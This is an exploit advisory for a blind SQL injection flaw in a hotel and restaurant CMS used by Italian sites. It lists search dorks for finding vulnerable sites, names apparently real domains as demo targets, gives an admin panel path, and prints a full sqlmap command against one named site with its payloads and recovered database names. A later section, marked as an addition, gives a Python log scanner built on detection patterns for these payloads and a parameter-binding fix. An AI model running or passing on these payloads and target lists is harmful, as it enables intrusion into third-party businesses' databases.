# Exploit Title: Italian Hotels Blind SQL Injection vulnerability
# Date: 30/11/2019
# Dork: inurl:camere-dettaglio.php?id= site:.it
inurl:restaurant-news-detail.php?id= site:.it
inurl:rooms-suites.php?id= site:.it
inurl:room.php?id= site:.it
# Exploit Author: H9xHacker
# Tested on: Linux
Reverse check bing.com
ip:151.11.51.124 .php?id= (There are 202 domains hosted on this server.)
# Demo
ristorantelaspada.it/en/restaurant-news-detail.php?id=32
lungarnovespucci50.com/en/camere-dettaglio.php?id=9
hotelbeyfin.com/de/rooms-suites.php?id=27
# Admin control panel path
http://www.website.com/cms-admin/
OR
http://www.website.it/cms-admin/
# PoC:
sqlmap --level=5 --risk=3 --timeout=10 --threads=10 --random-agent -u 'http://ristorantelaspada.it/en/restaurant-news-detail.php?id=32' --no-cast --batch --dbs
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=32' AND 2568=2568-- AtOc
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
Payload: id=32' OR (SELECT 9574 FROM (SELECT(SLEEP(5)))kdFW)-- xPIg
---
web application technology: Apache, PHP
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
[*] information_schema
[*] ristorantelaspada_it_01
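
For operators of sites running these scripts, the following is an added example (not part of the original advisory or the CMS) that scans web-server access logs for the two payload types sqlmap reported against the `id` parameter. The log format (Apache combined-style), the sample lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script names from the advisory's dork list; their id is expected to be numeric.
PAGES = {"camere-dettaglio.php", "restaurant-news-detail.php",
         "rooms-suites.php", "room.php"}
# Patterns modelled on the two payload types in the sqlmap output.
TIME_BLIND = re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)
BOOL_BLIND = re.compile(r"\b(?:and|or)\b\s+\(?\s*\d+\s*=\s*\d+", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Nov/2019:10:00:01 +0100] "GET /en/restaurant-news-detail.php?id=32 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [30/Nov/2019:10:00:02 +0100] "GET /en/restaurant-news-detail.php?id=32%27%20AND%202568%3D2568--%20AtOc HTTP/1.1" 200 5120',
    '198.51.100.9 - - [30/Nov/2019:10:00:09 +0100] "GET /de/rooms-suites.php?id=27%27%20OR%20(SELECT%209574%20FROM%20(SELECT(SLEEP(5)))kdFW)--%20xPIg HTTP/1.1" 200 4096',
    '198.51.100.9 - - [30/Nov/2019:10:00:10 +0100] "GET /en/camere-dettaglio.php?id=9%27 HTTP/1.1" 500 312',
    '203.0.113.7 - - [30/Nov/2019:10:00:11 +0100] "GET /en/contact.php?id=abc HTTP/1.1" 200 900',
]


def classify_id(value):
    """Return None for a plain numeric id, otherwise a finding label."""
    if re.fullmatch(r"[0-9]+", value):
        return None
    if TIME_BLIND.search(value):
        return "time-based blind"
    if BOOL_BLIND.search(value):
        return "boolean-based blind"
    return "non-numeric id"


def scan(lines):
    """Return (client_ip, path, label) for each suspicious id on the listed pages."""
    findings = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if url.path.rsplit("/", 1)[-1] not in PAGES:
            continue
        # parse_qsl percent-decodes the value, so encoded quotes and spaces are seen.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key == "id" and (label := classify_id(value)):
                findings.append((line.split()[0], url.path, label))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="\t")
```

Log review only shows that probing happened; the fix is to bind `id` as an integer parameter in the PHP query instead of concatenating it into the SQL string.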
------------------------
Greets: Black Hat Hackers